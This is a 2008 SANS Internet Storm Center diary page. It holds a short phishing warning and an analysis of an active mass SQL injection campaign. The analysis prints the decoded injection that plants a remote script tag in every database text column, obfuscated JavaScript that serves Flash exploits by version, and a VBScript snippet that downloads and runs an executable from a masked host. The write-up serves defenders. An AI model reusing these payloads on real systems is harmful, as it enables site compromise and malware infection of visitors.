Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2008-08-08 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

'CNN - My Custom Alert'

Published: 2008-08-08
Last Updated: 2008-08-08 17:47:53 UTC
by Mari Nichols (Version: 1)
2 comment(s)

Thanks to our readers for letting us know that they are receiving a good amount of some very authentic looking phishing spam.  Although the email appears to be from CNN again, the origination address is not even obfuscated. ISC Handler, Daniel had written a story about the "CNN - Top Ten" storm worm a few days ago.

isc.sans.org/diary.html

These sort of emails have one big thing going for them.  The ability to get that user to click.  The CNN brand is trusted and recognized by almost all of our users.  Anyone seeing this email may not think twice about clicking on the link unless we tell them not to.  What a great opportunity for user training.  Send out a short Security Awareness Email to your users and explain to them what it really happening.  Ask them to tell their kids too. 

Far too many people are making this a very profitable way for cyber-criminals to make money.   Try to help your end users understand how to spot a fraudulent email address, how to dissect a domain name and find a masked url address.  Just think about all the infections and exploitations you may prevent.

For more information see the Anti-Phishing Working Group website.

http://www.antiphishing.org/
 

Keywords:
2 comment(s)

More SQL Injections - very active right now

Published: 2008-08-08
Last Updated: 2008-08-08 16:40:52 UTC
by Mark Hofman (Version: 1)
5 comment(s)

Scott one of our readers wrote in to let us know that attempts were being made on his servers through an SQL injection.  He was the first and assisted with analysis, but he was not the last.  Since the first report we have received several in the last 4 hours or so.  There seems to be a lot of activity with this particular attack.

It looks like a repeat/variant on the attacks mentioned by Bojan here.

Overview:

                                                                                   |---i/f16.swf
                                                              |--- i1.html ---|---i/f28.swf
                              |--- Flash.htm -------|                    |---i/f64.swf
                              |                              |--- f2.html ---|---i/f115.swf
                              |--- 06014.htm                             |---i/f45.swf
                              |                                                   |---i/f47.swf
w.js --- new.htm ---|--- yahoo.htm--|
                              |                       |
                              |--- office.htm--| --rondll32.exe--msyahoo.exe--wsv.exe/thunder.exe
                              |                       |
                              |--- ksx.htm ----|

The Injection:
The string being injected is

“DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
368617228323535292C40432076617263686172283430303029204445434C415245205461626
C655F437572736------------snip ------------2204445414C4C4F43436F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)" :”

Which breaks down into:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo.  1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

Various types of sites seem to be hit at the moment.  From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.

Next:

A user visiting the site will hit w.js which, if they are using english, will pull down new.htm.  new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages,  flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.   Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html

i1.html & f2.html

These file contains some java script:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>S

This expands out to:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}; document.write("")

So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc).   Detection for these is poor.  The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious.

yahoo.htm

The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute.

pre>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script
</pre>

Office.htm

Attempts to create activeX objects and pulls the same rondll32.exe.  It looks like rondll32.exe pulls down thunder.exe and wsv.exe

ksx.htm

Attempts get the browser to include the rondll32.exe file

Detection for rondll32.exe is good with most AV products catching this one.

06014.htm

was unavailable at the time I checked.

 

These attacks are happening right now.  The people that reported them identified the attacks in their log files and IDS systems.  It is good to see that people are checking their logs.   Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site.  This round looks like it has just started.  We'll keep an eye on how this develops.

 

Cheers.

Mark - Shearwater

 

 




 

Keywords: sql injection
5 comment(s)
Diary Archives